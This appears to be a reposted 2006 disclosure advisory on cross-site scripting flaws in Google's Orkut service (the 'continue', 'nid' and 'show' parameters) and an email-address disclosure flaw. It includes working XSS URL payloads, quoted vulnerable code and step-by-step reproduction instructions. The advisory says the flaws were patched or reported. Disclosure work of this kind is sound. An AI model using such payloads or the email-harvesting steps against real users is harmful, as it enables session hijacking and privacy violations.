Home Home   Your IP: 54.158.55.251 Forum [Blog]

-: Exploits - Bugs - Vulnerabilities :-


Orkut Multiple Cross Site Scripting Vulnerabilities

########################################################

XDisclose Advisory : XD100097, XD100098, XD100092
Vulnerability Discovered : November 30th 2006
Advisory Released : December 8th 2006
Credit : Rajesh Sethumadhavan

Class : Information Disclosure
Cross Site Scripting
Html Injection
Severity : Highly Critical
Solution Status : Patched/Reported to Vendor
Vendor : Google Inc
Vendor Website : http://www.orkut.com
Affected applications : Orkut Services
Affected Platform : All

########################################################


Overview:
Orkut is an Internet social network service run by Google with more than 37 million total members and nearly 1.3 million daily visitors. It claims to be designed to help users meet new friends and maintain existing relationships with pictures and messages, and establish new ones by reaching out to people you've never met before.

Description:
Orkut service is vulnerable to Cross-Site Scripting and HTML Injection and email address disclosure vulnerability. Which result in email address disclosure, stealing of cookie, IP info, refer info, browser information, clipboard content, operating system info, hardware Info, modification of page or html injection, url redirection, port scanning of the network, and even phishing is possible. This is caused due to improper validation of user-supplied inputs and improper designing of orkut portal.

1) Orkut Multiple Cross Site Scripting Vulnerabilities
A remote attacker can craft a GET request with the XSS payload as demonstrated below. When the victim clicks on the GET request the payload will get executed which result in stealing of cookie.

A) Orkut Invite XSS:
The flaws are due to improper sanitization of inputs passed to 'continue' parameter in GET request
---------------------------------------------------
http://www.orkut.com/Invite.aspx?continue=javascript: alert(document.cookie)
---------------------------------------------------

Demonstration:
Note: Demonstration leads to your personal information disclosure
- Login to your orkut account
- Paste the above URL
- Click on BACK button
- Orkut Cookies will get displayed

The similar way HTML injection is also possible.

Vulnerable Code:
----------------------------------------------------
<td valign="top"><br>
<table class="btn" border="0" cellpadding="0" cellspacing="0" onmouseover="this.className='btnHover'" onmouseout="this.className ='btn'"><br>
<tr style="cursor: pointer;" onclick="window.location='javascript: alert(document.cookie)';" id="b0"><br>
<td><img src="http://images3.orkut.com/img/bl.gif" alt="" /></td>
<td nowrap style="background: url (http://images3.orkut.com/img/bm.gif)">back </td>
-----------------------------------------------------

B) Orkut Next page XSS:
The flaws are due to improper sanitization of inputs passed to 'nid' parameter in GET request. This vulnerability is already fixed 2 days before

Get Request with XSS payload:
-----------------------------------------------------
http://www.orkut.com/Scrapbook.aspx?uid=3595989687719502785 &pageSize=&na=3&nst=-2&nid=13550271097807907792-} ;%20alert('Xdisclose');%20function%20tt(){//
-----------------------------------------------------

Vulnerable Code:
-----------------------------------------------------
function changePageSize(value) { window.location="/Scrapbook.aspx?uid=3595989687719502785&na= 1&nst =1&nid=13550271097807907792-"}; alert('Xdisclose'); function tt(){//&pageSize="+value; }
-----------------------------------------------------

C) Orkut Group XSS:
The flaws are due to improper sanitization of inputs passed to 'show' parameter in GET request
-----------------------------------------------------
http://www.orkut.com/Friends.aspx?show=group1);
alert(document.cookie);
-----------------------------------------------------

Demonstration:
Note: Demonstration leads to your personal information disclosure
- Login to your orkut account
- Paste the above URL
- Click on 'delete group' & 'ok' button
- Orkut Cookies will get displayed

The similar way HTML injection is also possible.

Vulnerable Code:
-----------------------------------------------------
< a href="javascript:handleDeleteGroup('', 1);
alert(document.cookie);">
-----------------------------------------------------

Impact:
Successful exploitation allows execution of arbitrary script code in a userís browser session in context of an affected site which result in stealing of cookie(account login without password), IP info, refer info, browser information, clipboard content, operating system info, Referer info, hardware Info, modification of page or html injection (temporary webpage defacement), modification of page title, hijacking page flow, url redirection, port scanning of the victimís network, and even phishing is possible.

Impact of the vulnerability is network level.

Solution:
Orkut can improve their filters by disallowing certain characters like " <>/\?&`~!@#$%^*()[]|;:"' " in user input URL.

Screenshot:
http://www.xdisclose.com/images/xdorkutinvitexss.jpg
http://www.xdisclose.com/images/xdorkutgroupxss.jpg

2) Orkut Email Address Disclosure Vulnerability
Orkut service is vulnerable to email address disclosure vulnerability. Due to this It is possible to get email address of any users in orkut. This is caused due to improper designing of orkut portal.

Description:
A remote attacker can get the email address of anyone in the orkut as demonstrated below. The victim interaction is not required at all.

Demonstration:
Note: Demonstration leads to email address information disclosure
- Login to your orkut account
- Add any user as your friend (Person you want to get email address)
- Click 'friends' tab
- Click 'open friend requests' tab
- Click edit button the email address of the user will be displayed as in the screenshot

Same way your can find your friends email address also

Impact:
Successful exploitation allows email address disclosure.

Solution: Orkut can improve their portal design by hiding the users email address

Screenshot:
http://www.xdisclose.com/images/xdorkutemailid.jpg

Original Advisory:
http://www.xdisclose.com/advisory/XD100098.html

Credits:
Rajesh Sethumadhavan has been credited with the discovery of this vulnerability

Disclaimer:
This entire document is strictly for educational, testing and demonstrating purpose only. Modification use and/or publishing this information is entirely on your own risk. The exploit code is to be used on your own orkut account. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.








© 2014 Insecure Lab, India                               Affiliates | Contact